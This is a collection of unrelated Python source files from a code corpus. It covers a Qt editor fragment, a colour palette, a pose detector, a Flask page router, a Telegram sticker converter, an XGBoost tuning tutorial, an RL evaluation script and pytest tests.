self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
fill_fields(self)
def hslider_moved(self, value, my_object, property, label_to_set, factor=1):
if self.pt_idx == 0 and property == 'size':
for point in self.scene.eucl["points"]:
point["duck"]["size"] = value/factor
my_object[property] = value/factor
label_to_set.setText('%2.2f' % (value/factor))
def hslider_released(self):
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
def le_signpost_text_editing_finished(self):
duck = self.scene.eucl["points"][self.pt_idx]["duck"]
if not self.ui.le_signpost_text.hasFocus():
try:
duck["accessories_text"] = self.ui.le_signpost_text.text()
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
except:
self.ui.le_signpost_text.setText(duck["accessories_text"])
else:
self.ui.duck_show.setFocus()
def le_bubble_text_editing_finished(self):
duck = self.scene.eucl["points"][self.pt_idx]["duck"]
if not self.ui.le_bubble_text.hasFocus():
try:
duck["thought_text"] = self.ui.le_bubble_text.text()
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
except:
self.ui.le_bubble_text.setText(duck["thought_text"])
else:
self.ui.duck_show.setFocus()
def colour_open(self, my_object, property):
dialog_colour = ColourDialog(self.scene, self.pt_idx, my_object, property)
dialog_colour.setWindowIcon(QtGui.QIcon("icon/ico.png"))
dialog_colour.exec_()
#
| StarcoderdataPython |
84087 | <reponame>desty2k/QDarkStyleSheet
# colorsystem.py is the full list of colors that can be used to easily create themes.
class Gray:
B0 = '#000000'
B10 = '#19232D'
B20 = '#293544'
B30 = '#37414F'
B40 = '#455364'
B50 = '#54687A'
B60 = '#60798B'
B70 = '#788D9C'
B80 = '#9DA9B5'
B90 = '#ACB1B6'
B100 = '#B9BDC1'
B110 = '#C9CDD0'
B120 = '#CED1D4'
B130 = '#E0E1E3'
B140 = '#FAFAFA'
B150 = '#FFFFFF'
class Blue:
B0 = '#000000'
B10 = '#062647'
B20 = '#26486B'
B30 = '#375A7F'
B40 = '#346792'
B50 = '#1A72BB'
B60 = '#057DCE'
B70 = '#259AE9'
B80 = '#37AEFE'
B90 = '#73C7FF'
B100 = '#9FCBFF'
B110 = '#C2DFFA'
B120 = '#CEE8FF'
B130 = '#DAEDFF'
B140 = '#F5FAFF'
B150 = '#FFFFFF'
class Green:
B0 = '#000000'
B10 = '#064738'
B20 = '#055C49'
B30 = '#007A5E'
B40 = '#008760'
B50 = '#019D70'
B60 = '#02BA85'
B70 = '#20C997'
B80 = '#44DEB0'
B90 = '#3BEBB7'
B100 = '#88F2D3'
B110 = '#B0F5E1'
B120 = '#D1FBEE'
B130 = '#E4FFF7'
B140 = '#F5FFFD'
B150 = '#FFFFFF'
class Red:
B0 = '#000000'
B10 = '#470606'
B20 = '#760B0B'
B30 = '#AF0F0F'
B40 = '#D4140B'
B50 = '#DE321F'
B60 = '#E24232'
B70 = '#E74C3C'
B80 = '#F66657'
B90 = '#F88478'
B100 = '#FFACA4'
B110 = '#FFC3BD'
B120 = '#FEDDDA'
B130 = '#FFEEEE'
B140 = '#FFF5F5'
B150 = '#FFFFFF'
class Orange:
B0 = '#000000'
B10 = '#471D06'
B20 = '#692907'
B30 = '#AB3E00'
B40 = '#CE4B01'
B50 = '#E05E15'
B60 = '#E57004'
B70 = '#F37E12'
B80 = '#FF993B'
B90 = '#FFB950'
B100 = '#FFCF84'
B110 = '#FFDDA7'
B120 = '#FFEACA'
B130 = '#FFF3E2'
B140 = '#FFFBF5'
B150 = '#FFFFFF'
class GroupDark:
B10 = '#E11C1C'
B20 = '#FF8A00'
B30 = '#88BA00'
B40 = '#2DB500'
B50 = '#3FC6F0'
B60 = '#107EEC'
B70 = '#5C47E0'
B80 = '#7F27C5'
B90 = '#C88AFA'
B100 = '#AF2294'
B110 = '#DB4D8E'
B120 = '#38D4A4'
class GroupLight:
B10 = '#FF6700'
B20 = '#FFB000'
B30 = '#FFE600'
B40 = '#7FDD05'
B50 = '#00A585'
B60 = '#22BCF2'
B70 = '#1256CC'
B80 = '#803AD0'
B90 = '#B568F2'
B100 = '#CC2782'
B110 = '#FF71BF'
B120 = '#7EE8C7'
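# Usage sketch (not part of the original palette file): an application would typically
# interpolate these constants into a Qt stylesheet; the selectors below are illustrative only.
DARK_QSS = (
"QWidget { background-color: %s; color: %s; }"
"QPushButton:hover { background-color: %s; }"
) % (Gray.B10, Gray.B130, Blue.B50)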
| StarcoderdataPython |
3343467 | import json
import math
class Pose:
HOLD = "HOLD"
TURN_RIGHT = "TURN_RIGHT"
TURN_LEFT = "TURN_LEFT"
THROTTLE_UP = "THROTTLE_UP"
THROTTLE_DOWN = "THROTTLE_DOWN"
FORWARD = "FORWARD"
class Point:
def __init__(self, x, y, acc, index, desc):
self.x = x
self.y = y
self.acc = acc
self.index = index
self.desc = desc
def __str__(self):
return "[x: " + str(self.x) + ", y: " + str(self.y) + ", acc: " + str(
int(self.acc * 100)) + "%" + ", index: " + str(self.index) + ", desc: " + str(self.desc) + "]"
def __repr__(self):
return self.__str__()
def distance_to(self, point):
return math.sqrt(((self.x - point.x) ** 2) + ((self.y - point.y) ** 2))
def gradient_to(self, point):
return (self.y - point.y) / (self.x - point.x)
class Skeleton:
def __init__(self, frame, keypoints, required_accuracy):
self.frame = frame
self.keypoints = keypoints
self.required_accuracy = required_accuracy
def check_for_important_keypoints(self):
if 8 not in self.keypoints:
print("Hip not detected at frame " + str(self.frame) + "!")
return False
elif 8 in self.keypoints and self.keypoints[8].acc < self.required_accuracy:
print("Detected hip with low accuracy of ~" + str(int(self.keypoints[8].acc * 100)) + "% at frame " +
str(self.frame) + "!")
return False
elif 2 not in self.keypoints:
print("Right shoulder not detected at frame " + str(self.frame) + "!")
return False
elif 2 in self.keypoints and self.keypoints[2].acc < self.required_accuracy:
print("Detected right shoulder with low accuracy of ~" +
str(int(self.keypoints[2].acc * 100)) + "% at frame " + str(self.frame) + "!")
return False
elif 5 not in self.keypoints:
print("Left shoulder not detected at frame " + str(self.frame) + "!")
return False
elif 5 in self.keypoints and self.keypoints[5].acc < self.required_accuracy:
print("Detected left shoulder with low accuracy of ~" +
str(int(self.keypoints[5].acc * 100)) + "% at frame " + str(self.frame) + "!")
return False
elif 4 not in self.keypoints:
print("Right hand not detected at frame " + str(self.frame) + "!")
return False
elif 4 in self.keypoints and self.keypoints[4].acc < self.required_accuracy:
print("Detected right hand with low accuracy of ~" +
str(int(self.keypoints[4].acc * 100)) + "% at frame " + str(self.frame) + "!")
return False
elif 7 not in self.keypoints:
print("Left hand not detected at frame " + str(self.frame) + "!")
return False
elif 7 in self.keypoints and self.keypoints[7].acc < self.required_accuracy:
print("Detected left hand with low accuracy of ~" +
str(int(self.keypoints[7].acc * 100)) + "% at frame " + str(self.frame) + "!")
return False
return True
def transform_points(self):
for key in self.keypoints:
if self.keypoints[key].index != 8:
self.keypoints[key].x = self.keypoints[key].x - self.keypoints[8].x
self.keypoints[key].y = self.keypoints[8].y - self.keypoints[key].y
self.keypoints[8].x = 0
self.keypoints[8].y = 0
class PoseDetector:
def __init__(self, skeleton):
self.skeleton = skeleton
self.handGradient = None
self.handDistance = None
self.shoulderDistance = None
self.handToShoulderDistance = None
def calc_hand_gradient(self):
if self.skeleton.keypoints[4] is not None and self.skeleton.keypoints[7] is not None:
self.handGradient = self.skeleton.keypoints[7].gradient_to(self.skeleton.keypoints[4])
else:
self.handGradient = None
def get_hand_gradient(self):
if self.handGradient is None:
self.calc_hand_gradient()
return self.handGradient
def calc_hand_distance(self):
if self.skeleton.keypoints[4] is not None and self.skeleton.keypoints[7] is not None:
self.handDistance = self.skeleton.keypoints[7].distance_to(self.skeleton.keypoints[4])
else:
self.handDistance = None
def get_hand_distance(self):
if self.handDistance is None:
self.calc_hand_distance()
return self.handDistance
def calc_shoulder_distance(self):
if self.skeleton.keypoints[5] is not None and self.skeleton.keypoints[2] is not None:
self.shoulderDistance = self.skeleton.keypoints[5].distance_to(self.skeleton.keypoints[2])
else:
self.shoulderDistance = None
def get_shoulder_distance(self):
if self.shoulderDistance is None:
self.calc_shoulder_distance()
return self.shoulderDistance
def calc_hand_to_shoulder_distance(self):
if self.skeleton.keypoints[5] is not None and self.skeleton.keypoints[2] is not None and \
self.skeleton.keypoints[7] is not None and self.skeleton.keypoints[4] is not None:
right_distance = self.skeleton.keypoints[2].y - self.skeleton.keypoints[4].y
left_distance = self.skeleton.keypoints[5].y - self.skeleton.keypoints[7].y
self.handToShoulderDistance = (right_distance + left_distance) / 2
else:
self.handToShoulderDistance = None
def get_hand_to_shoulder_distance(self):
if self.handToShoulderDistance is None:
self.calc_hand_to_shoulder_distance()
return self.handToShoulderDistance
def detect_pose(self):
# Right turn: left hand up, right hand down
# => high hand gradient
if self.get_hand_gradient() > 0.7:
return Pose.TURN_RIGHT
# Left turn: left hand down, right hand up
# => high negative hand gradient
elif self.get_hand_gradient() < -0.7:
return Pose.TURN_LEFT
# Forward: both hands at shoulder height, close distance
# => low hand gradient, hands distance is close to shoulder distance, hands height is close to shoulders height
elif -0.2 <= self.get_hand_gradient() <= 0.2 \
and self.get_shoulder_distance() - 100 <= self.get_hand_distance() <= self.get_shoulder_distance() + 100 \
and -50 <= self.get_hand_to_shoulder_distance() <= 50:
return Pose.FORWARD
# Throttle up: both hands high, close distance
# => hands height is higher than shoulder height, low hand gradient, low hands distance
elif self.get_hand_to_shoulder_distance() <= -100 \
and -0.2 <= self.get_hand_gradient() <= 0.2 \
and self.get_shoulder_distance() - 50 <= self.get_hand_distance() <= self.get_shoulder_distance() + 250:
return Pose.THROTTLE_UP
# Throttle down: both hands low, close distance
# => hands height is lower than shoulder height, low hand gradient, low hands distance
elif self.get_hand_to_shoulder_distance() > 0 \
and -0.2 <= self.get_hand_gradient() <= 0.2 \
and self.get_shoulder_distance() - 50 <= self.get_hand_distance() <= self.get_shoulder_distance() + 250:
return Pose.THROTTLE_DOWN
# Default:
# => hold position
else:
return Pose.HOLD
def return_number(number):
if number is None:
return "None"
else:
return str(round(number, 2))
log_file = open("../data/OpenPose Demo#1/log_minified", "r")
content = log_file.read()
parsed_data = json.loads(content)
total_scanned = 0
missing_keypoints = 0
for frame_set in parsed_data:
points = {}
for keypoint in frame_set["points"]:
points[keypoint["part"]] = Point(keypoint["x"], keypoint["y"], keypoint["accuracy"], keypoint["part"],
keypoint["description"])
skeleton = Skeleton(frame_set["index"], points, 0.4)
total_scanned += 1
if skeleton.check_for_important_keypoints():
skeleton.transform_points()
detector = PoseDetector(skeleton)
pose = detector.detect_pose()
print(pose + " (frame " + str(skeleton.frame) + " with HD " +
return_number(detector.handDistance) + "/HG " + return_number(detector.handGradient) + "/SD " +
return_number(detector.shoulderDistance) + "/HSD " + return_number(detector.handToShoulderDistance) + ")")
else:
missing_keypoints += 1
print("Detection rate: " + str(100 - round(100 * (missing_keypoints * 1.0 / total_scanned), 2)) + "% (" + str(
total_scanned - missing_keypoints) + "/" + str(total_scanned) + ")")
| StarcoderdataPython |
3344776 | from flask import abort, Blueprint, render_template
from jinja2.exceptions import TemplateNotFound
bp = Blueprint('pages', __name__, template_folder='templates')
pages_list = [
{
"page": "dichotomy-method",
"headline": "Dichotomy (Bisection method)",
"text": "Dichotomy (or Bisection) method is a root-finding "
"method that applies to any continuous functions for "
"which one knows two values with opposite signs.",
},
{
"page": "fixed-point-iteration",
"headline": "Fixed-point iteration",
"text": "Fixed-point iteration is a method of computing fixed points "
"of iterated functions. It can be also applied for finding the "
"root of continuous function"
},
{
"page": "linear-system",
"headline": "System of linear equations",
"text": "System of linear equations is a collection "
"of two or more linear equations involving the same set of variables."
"We will take a look at 2 methods of solving linear systems: Gaussian"
"elimination and Jacobi method"
},
{
"page": "unnamed-matrix",
"headline": "Unnamed matrix",
"text": "This is not a general method or something. It is required just to get the matrix based on some characteristics."
},
{
"page": "intersection-of-surfaces",
"headline": "Intersection of surfaces",
"text": "Intersection of surfaces... Ellipsoid and the plane."
},
{
"page": "cubic-splines",
"headline": "Cubic splines",
"text": "Cubic splines method is one of dozens methods of function interpolating."
},
{
"page" : "chebyshev-aproximation",
"headline": "Chebyshev polynoms & approximation",
"text": "Approximation of function using chebyshev polynoms",
},
{
"page" : "pelengate-problem",
"headline": "Pelengator problem",
"text": "Solution of pelengator problem using Newton method",
},
{
"page" : "runge-kutta",
"headline": "Runge-Kutta method",
"text": "Solution of Cauchy's problem using Runge-Kutta method",
},
{
"page" : "runge-kutta-pendulum",
"headline": "Runge-Kutta method for equation of pendulum",
"text": "Solution of diff. eq. of pendulum",
},
{
"page" : "runge-kutta-foxes-and-rabbits",
"headline": "Rabbits and foxes problem",
"text": "Runge-Kutta method for solving equations of modelling rabbits/foxes population",
},
]
@bp.route('/', defaults={'page': 'index'})
@bp.route('/<page>')
def get_page(page):
try:
if page == 'index':
return render_template('index.html', pages=pages_list)
else:
return render_template('%s.html' % page)
except TemplateNotFound:
abort(404)
| StarcoderdataPython |
1646868 | <filename>telegram_bot/sticker_set_downloader.py
''''''
import os
from PIL import Image
from telegram import Bot
from global_config.protected_config import _telegrambot_token
from global_config.environment_config import _base_dir, _temp_dir
from telegram_bot.func_helper import random_string, zip_dir
class StickerSetDownloader():
def __init__(self):
''''''
self.num_threads = 4
self.bot = Bot(_telegrambot_token)
@staticmethod
def webp2png(in_file_path, out_file_path):
''''''
im = Image.open(in_file_path)
im.save(out_file_path, 'PNG')
return out_file_path
@staticmethod
def tgs2mp4(in_file_path, out_file_path):
''''''
json_path = out_file_path.replace('mp4', 'json')
command = 'tgsconvert.py %(tgs)s %(json)s > /dev/null 2>&1'
command = command % {'tgs': in_file_path, 'json': json_path}
status = os.system(command)
if status != 0:
os.path.isfile(json_path) and os.remove(json_path)
raise Exception('tgsconvert.py error: execute .tgs => .json')
command = 'puppeteer-lottie -q -i %(json)s -o %(mp4)s > /dev/null 2>&1'
command = command % {'json': json_path, 'mp4': out_file_path}
status = os.system(command)
os.path.isfile(json_path) and os.remove(json_path)
if status != 0:
raise Exception('puppeteer-lottie error: execute .json => .mp4')
else:
return out_file_path
@staticmethod
def mp42gif(in_file_path, out_file_path):
''''''
command = 'ffmpeg -y -i %(mp4)s -filter_complex "fps=30" %(gif)s'
command = command % {'mp4': in_file_path, 'gif': out_file_path}
status = os.system(command + ' > /dev/null 2>&1')
if status != 0:
raise Exception('ffmpeg error: execute .mp4 => .gif')
else:
return out_file_path
def download_sticker(self, file_id, save_dir=None, random_name=False):
''''''
sticker = file_id if not isinstance(file_id, str) else self.bot.get_file(file_id)
# use default `temp` path
save_dir = save_dir or _temp_dir
file_name = sticker.file_path.split('/')[-1]
if random_name:
file_name = random_string() + '.webp'
file_path = os.path.join(save_dir, file_name)
out_path = file_path.replace('webp', 'png')
# download and convert
sticker.download(custom_path=file_path)
self.webp2png(file_path, out_path)
return (file_path, out_path)
def download_sticker_set(self, sticker_set_name, out_path=None):
''''''
sticker_set = self.bot.get_sticker_set(sticker_set_name)
stickers = sticker_set.stickers
# make dir `sticker_set_name`
file_dir = os.path.join(_temp_dir, sticker_set_name)
os.path.isdir(file_dir) or os.makedirs(file_dir)
# download and convert
for sticker in stickers:
file_id = sticker.file_id
webp_path, _ = self.download_sticker(file_id, save_dir=file_dir, random_name=True)
os.path.isfile(webp_path) and os.remove(webp_path)
# zip
out_path = out_path or file_dir + '.zip'
zip_dir(file_dir, out_path)
return out_path
def download_sticker_animated(self, file_id, save_dir=None, random_name=False):
''''''
sticker = file_id if not isinstance(file_id, str) else self.bot.get_file(file_id)
# use default `temp` path
save_dir = save_dir or _temp_dir
file_name = sticker.file_path.split('/')[-1]
if random_name:
file_name = random_string() + '.tgs'
file_path = os.path.join(save_dir, file_name)
out_path_mp4 = file_path.replace('tgs', 'mp4')
out_path_gif = file_path.replace('tgs', 'gif')
# download and convert
sticker.download(custom_path=file_path)
self.tgs2mp4(file_path, out_path_mp4)
self.mp42gif(out_path_mp4, out_path_gif)
return (file_path, out_path_mp4, out_path_gif)
def download_sticker_animated_pack(self, file_id, pack_name, out_path=None):
''''''
# make dir `pack_name`
file_dir = os.path.join(_temp_dir, pack_name)
os.path.isdir(file_dir) or os.makedirs(file_dir)
# download and convert
self.download_sticker_animated(file_id, save_dir=file_dir, random_name=True)
# zip
out_path = out_path or file_dir + '.zip'
zip_dir(file_dir, out_path)
return out_path
_sticker = StickerSetDownloader()
download_sticker = _sticker.download_sticker
download_sticker_set = _sticker.download_sticker_set
download_sticker_animated_pack = _sticker.download_sticker_animated_pack
if __name__ == '__main__':
pass
| StarcoderdataPython |
146368 |
"""
General Approach for Parameter Tuning
We will use an approach similar to that of GBM here. The various steps to be performed are:
1. Choose a relatively high learning rate. Generally a learning rate of 0.1 works, but somewhere
between 0.05 and 0.3 should work for different problems. Determine the optimum number of trees
for this learning rate. XGBoost has a very useful function called "cv" which performs cross-validation
at each boosting iteration and thus returns the optimum number of trees required.
2. Tune tree-specific parameters (max_depth, min_child_weight, gamma, subsample, colsample_bytree)
for the decided learning rate and number of trees. Note that we can choose different parameters to
define a tree and I'll take up an example here.
3. Tune regularization parameters (lambda, alpha) for XGBoost, which can help reduce model complexity
and enhance performance.
4. Lower the learning rate and decide the optimal parameters.
Let us look at a more detailed step by step approach.
"""
# Imports assumed by the snippets below. `train`, `target` and `IDcol` (the training
# DataFrame, target column name and ID column name) are expected to be defined elsewhere.
import pandas as pd
import matplotlib.pyplot as plt
import xgboost as xgb
from xgboost import XGBClassifier
from sklearn import metrics
from sklearn.model_selection import GridSearchCV
### below may be helpful
def modelfit(alg, dtrain, predictors, useTrainCV=True, cv_folds=5, early_stopping_rounds=50):
if useTrainCV:
xgb_param = alg.get_xgb_params()
xgtrain = xgb.DMatrix(dtrain[predictors].values, label=dtrain[target].values)
cvresult = xgb.cv(xgb_param, xgtrain, num_boost_round=alg.get_params()['n_estimators'], nfold=cv_folds,
metrics='auc', early_stopping_rounds=early_stopping_rounds, show_progress=False)
alg.set_params(n_estimators=cvresult.shape[0])
#Fit the algorithm on the data
alg.fit(dtrain[predictors], dtrain['Disbursed'],eval_metric='auc')
#Predict training set:
dtrain_predictions = alg.predict(dtrain[predictors])
dtrain_predprob = alg.predict_proba(dtrain[predictors])[:,1]
#Print model report:
print("\nModel Report")
print("Accuracy : %.4g" % metrics.accuracy_score(dtrain['Disbursed'].values, dtrain_predictions))
print("AUC Score (Train): %f" % metrics.roc_auc_score(dtrain['Disbursed'], dtrain_predprob))
feat_imp = pd.Series(alg.booster().get_fscore()).sort_values(ascending=False)
feat_imp.plot(kind='bar', title='Feature Importances')
plt.ylabel('Feature Importance Score')
"""
Step 1: Fix learning rate and number of estimators for tuning tree-based parameters
In order to decide on boosting parameters, we need to set some initial values of other parameters.
Lets take the following values:
max_depth = 5 : This should be between 3-10. I’ve started with 5 but you can choose a different
number as well. 4-6 can be good starting points.
min_child_weight = 1 : A smaller value is chosen because it is a highly imbalanced class problem
and leaf nodes can have smaller size groups.
gamma = 0 : A smaller value like 0.1-0.2 can also be chosen for starting. This will anyways be tuned later.
subsample, colsample_bytree = 0.8 : This is a commonly used start value. Typical values range between
0.5-0.9.
scale_pos_weight = 1: Because of high class imbalance.
Please note that all the above are just initial estimates and will be tuned later.
Lets take the default learning rate of 0.1 here and check the optimum number of trees
using cv function of xgboost. The function defined above will do it for us.
"""
#Choose all predictors except target & IDcols
predictors = [x for x in train.columns if x not in [target, IDcol]]
xgb1 = XGBClassifier(
learning_rate =0.1,
n_estimators=1000,
max_depth=5,
min_child_weight=1,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
objective= 'binary:logistic',
nthread=4,
scale_pos_weight=1,
seed=27)
modelfit(xgb1, train, predictors)
"""
Step 2: Tune max_depth and min_child_weight
This is in lieu of the for loop that I employed on the initial XGBoost taxi data run.
Spits out a big matrix of parameter combinations and you select the best ones based on the score.
We tune these first as they will have the highest impact on model outcome. To start with,
let’s set wider ranges and then we will perform another iteration for smaller ranges.
Important Note: I’ll be doing some heavy-duty grid searched in this section which can take 15-30 mins
or even more time to run depending on your system. You can vary the number of values you are testing
based on what your system can handle.
"""
param_test1 = {
'max_depth':range(3,10,2),
'min_child_weight':range(1,6,2)
}
gsearch1 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=140, max_depth=5,
min_child_weight=1, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1, seed=27),
param_grid = param_test1, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch1.fit(train[predictors],train[target])
gsearch1.grid_scores_, gsearch1.best_params_, gsearch1.best_score_
"""
Here, we have run 12 combinations with wider intervals between values.
The ideal values are 5 for max_depth and 5 for min_child_weight.
Lets go one step deeper and look for optimum values. We’ll search for values 1 above and
below the optimum values because we took an interval of two.
"""
param_test2 = {
'max_depth':[4,5,6],
'min_child_weight':[4,5,6]
}
gsearch2 = GridSearchCV(estimator = XGBClassifier( learning_rate=0.1, n_estimators=140, max_depth=5,
min_child_weight=2, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test2, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch2.fit(train[predictors],train[target])
gsearch2.grid_scores_, gsearch2.best_params_, gsearch2.best_score_
"""
Here, we get the optimum values as 4 for max_depth and 6 for min_child_weight.
Also, we can see the CV score increasing slightly. Note that as the model performance increases,
it becomes exponentially difficult to achieve even marginal gains in performance.
You would have noticed that here we got 6 as the optimum value for min_child_weight
but we haven't tried values greater than 6. We can do that as follows.
"""
param_test2b = {
'min_child_weight':[6,8,10,12]
}
gsearch2b = GridSearchCV(estimator = XGBClassifier( learning_rate=0.1, n_estimators=140, max_depth=4,
min_child_weight=2, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test2b, scoring='roc_auc', n_jobs=4, iid=False, cv=5)
gsearch2b.fit(train[predictors],train[target])
modelfit(gsearch2b.best_estimator_, train, predictors)
gsearch2b.grid_scores_, gsearch2b.best_params_, gsearch2b.best_score_
"""
We see 6 as the optimal value.
"""
"""
Step 3: Tune gamma
Now let's tune the gamma value using the parameters already tuned above.
Gamma can take various values but I'll check for 5 values here.
You can go into more precise values as needed.
"""
param_test3 = {
'gamma':[i/10.0 for i in range(0,5)]
}
gsearch3 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=140, max_depth=4,
min_child_weight=6, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test3, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch3.fit(train[predictors],train[target])
gsearch3.grid_scores_, gsearch3.best_params_, gsearch3.best_score_
"""
This shows that our original value of gamma, i.e. 0 is the optimum one.
Before proceeding, a good idea would be to re-calibrate the number of boosting rounds for the
updated parameters."""
xgb2 = XGBClassifier(
learning_rate =0.1,
n_estimators=1000,
max_depth=4,
min_child_weight=6,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
objective= 'binary:logistic',
nthread=4,
scale_pos_weight=1,
seed=27)
modelfit(xgb2, train, predictors)
"""
Here, we can see the improvement in score. So the final parameters are:
max_depth: 4
min_child_weight: 6
gamma: 0"""
"""Step 4: Tune subsample and colsample_bytree
The next step would be to try different subsample and colsample_bytree values.
Let's do this in 2 stages as well and take values 0.6, 0.7, 0.8, 0.9 for both to start with."""
param_test4 = {
'subsample':[i/10.0 for i in range(6,10)],
'colsample_bytree':[i/10.0 for i in range(6,10)]
}
gsearch4 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
min_child_weight=6, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test4, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch4.fit(train[predictors],train[target])
gsearch4.grid_scores_, gsearch4.best_params_, gsearch4.best_score_
param_test5 = {
'subsample':[i/100.0 for i in range(75,90,5)],
'colsample_bytree':[i/100.0 for i in range(75,90,5)]
}
gsearch5 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
min_child_weight=6, gamma=0, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test5, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch5.fit(train[predictors],train[target])
"""
Step 5: Tuning Regularization Parameters
Next step is to apply regularization to reduce overfitting.
Though many people don't use these parameters much, as gamma provides a substantial way of controlling
complexity. But we should always try it. I'll tune the 'reg_alpha' value here and leave it up to you to
try different values of ‘reg_lambda’."""
param_test6 = {
'reg_alpha':[1e-5, 1e-2, 0.1, 1, 100]
}
gsearch6 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
min_child_weight=6, gamma=0.1, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test6, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch6.fit(train[predictors],train[target])
gsearch6.grid_scores_, gsearch6.best_params_, gsearch6.best_score_
"""We can see that the CV score is less than the previous case.
But the values tried are very widespread; we should try values closer to the optimum here (0.01)
to see if we get something better."""
param_test7 = {
'reg_alpha':[0, 0.001, 0.005, 0.01, 0.05]
}
gsearch7 = GridSearchCV(estimator = XGBClassifier( learning_rate =0.1, n_estimators=177, max_depth=4,
min_child_weight=6, gamma=0.1, subsample=0.8, colsample_bytree=0.8,
objective= 'binary:logistic', nthread=4, scale_pos_weight=1,seed=27),
param_grid = param_test7, scoring='roc_auc',n_jobs=4,iid=False, cv=5)
gsearch7.fit(train[predictors],train[target])
gsearch7.grid_scores_, gsearch7.best_params_, gsearch7.best_score_
#You can see that we got a better CV.
#Now we can apply this regularization in the model and look at the impact:
xgb3 = XGBClassifier(
learning_rate =0.1,
n_estimators=1000,
max_depth=4,
min_child_weight=6,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
reg_alpha=0.005,
objective= 'binary:logistic',
nthread=4,
scale_pos_weight=1,
seed=27)
modelfit(xgb3, train, predictors)
"""Step 6: Reducing Learning Rate
Lastly, we should lower the learning rate and add more trees.
Let's use the cv function of XGBoost to do the job again."""
xgb4 = XGBClassifier(
learning_rate =0.01,
n_estimators=5000,
max_depth=4,
min_child_weight=6,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
reg_alpha=0.005,
objective= 'binary:logistic',
nthread=4,
scale_pos_weight=1,
seed=27)
modelfit(xgb4, train, predictors)
"""
Now we can see a significant boost in performance and the effect of parameter tuning is clearer.
As we come to the end, I would like to share 2 key thoughts:
1. It is difficult to get a very big leap in performance by just using parameter tuning or slightly
better models. The max score for GBM was 0.8487 while XGBoost gave 0.8494.
This is a decent improvement but not something very substantial.
2. A significant jump can be obtained by other methods like feature engineering,
creating an ensemble of models, stacking, etc.
You can also download the iPython notebook with all these model codes from my GitHub account.
For codes in R, you can refer to this article."""
| StarcoderdataPython |
3377568 | import os
import yaml
import argparse
import numpy as np
import torch
from discor.env import make_env
from discor.algorithm import EvalAlgorithm
def test(env, algo, render):
state = env.reset()
episode_return = 0.0
success = 0.0
done = False
while (not done):
action = algo.exploit(state)
next_state, reward, done, info = env.step(action)
if render:
env.render()
episode_return += reward
if env.is_metaworld and info['success'] > 1e-6:
success = info['success']
state = next_state
return episode_return, success
def run(args):
with open(args.config) as f:
config = yaml.load(f, Loader=yaml.SafeLoader)
policy_hidden_units = config['SAC']['policy_hidden_units']
# Create environments.
env = make_env(args.env_id)
env.seed(args.seed)
# Device to use.
device = torch.device(
"cuda" if args.cuda and torch.cuda.is_available() else "cpu")
# Evaluation algorithm.
algo = EvalAlgorithm(
state_dim=env.observation_space.shape[0],
action_dim=env.action_space.shape[0],
device=device,
policy_hidden_units=policy_hidden_units)
algo.load_models(os.path.join(args.log_dir, 'model', 'best'))
returns = np.empty((args.num_episodes))
success = np.empty((args.num_episodes))
env.render()
env.viewer._paused = True
for i in range(args.num_episodes):
returns[i], success[i] = test(env, algo, args.render)
env.viewer._paused = True
print('-' * 60)
print(f'Num Episodes: {args.num_episodes:<5}\n'
f'Mean Return : {returns.mean():<5.1f} '
f'+/- {returns.std():<5.1f} ')
if env.is_metaworld:
print(f'Success rate: {success.mean():<1.3f} ')
print('-' * 60)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--config', type=str, default=os.path.join('config', 'metaworld.yaml'))
parser.add_argument('--env_id', type=str, default='hammer-v1')
parser.add_argument('--log_dir', type=str, required=True)
parser.add_argument('--num_episodes', type=int, default=10)
parser.add_argument('--render', action='store_true')
parser.add_argument('--cuda', action='store_true')
parser.add_argument('--seed', type=int, default=0)
args = parser.parse_args()
run(args)
| StarcoderdataPython |
133437 | import pytest
# Code that uses this is commented-out below.
# from ..types import TrackingItem
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def tracking_item():
return {"tracking_type": "other", "other_tracking": {"extra_field": "extra_value"}}
def test_insert_and_get_tracking_item(testapp, tracking_item):
res = testapp.post_json('/tracking-items', tracking_item, status=201)
assert res.json['@graph'][0]['tracking_type'] == tracking_item['tracking_type']
res_uuid = res.json['@graph'][0]['uuid']
get_res = testapp.get('/tracking-items/' + res_uuid).follow()
assert get_res.json['other_tracking']['extra_field'] == tracking_item['other_tracking']['extra_field']
assert get_res.json.get('date_created')
# def test_tracking_item_create_and_commit(testapp, dummy_request):
# test_body = {
# "tracking_type": "other",
# "other_tracking": {"key1": "val1"},
# "submitted_by": "<EMAIL>"
# }
